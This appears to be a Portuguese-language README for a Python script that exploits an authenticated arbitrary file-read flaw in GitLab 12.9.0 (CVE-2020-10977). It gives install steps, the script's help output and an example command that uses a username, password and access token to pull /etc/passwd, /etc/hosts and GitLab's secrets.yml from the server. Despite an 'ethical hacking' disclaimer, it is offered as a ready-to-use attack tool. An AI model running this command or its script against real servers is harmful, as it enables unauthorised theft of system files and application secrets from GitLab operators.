
Um script (que pretende ser) melhor do que o que pode ser encontrado no exploit-db sobre a leitura arbitrária de arquivos autenticada no GitLab v12.9.0 (CVE-2020-10977)
Apenas para fins de demonstração e hacking ético.
Um script (que se pretende) melhor do que o que pode ser encontrado no exploit-db sobre a leitura arbitrária de arquivos autenticada no GitLab v12.9.0 (CVE-2020-10977)
pip3 install requests python-gitlab
https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES
argumentos opcionais:
-h, --help mostra esta mensagem de ajuda e sai
-H HOST, --host HOST A URI https do webroot do GitLab
-u USER, --user USER O nome do usuário
-p PASSWD, --passwd PASSWD
A senha do usuário
-t TOKEN, --token TOKEN
O token de acesso
-f FILES, --files FILES
Os caminhos absolutos para os arquivos no sistema local do GitLab
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml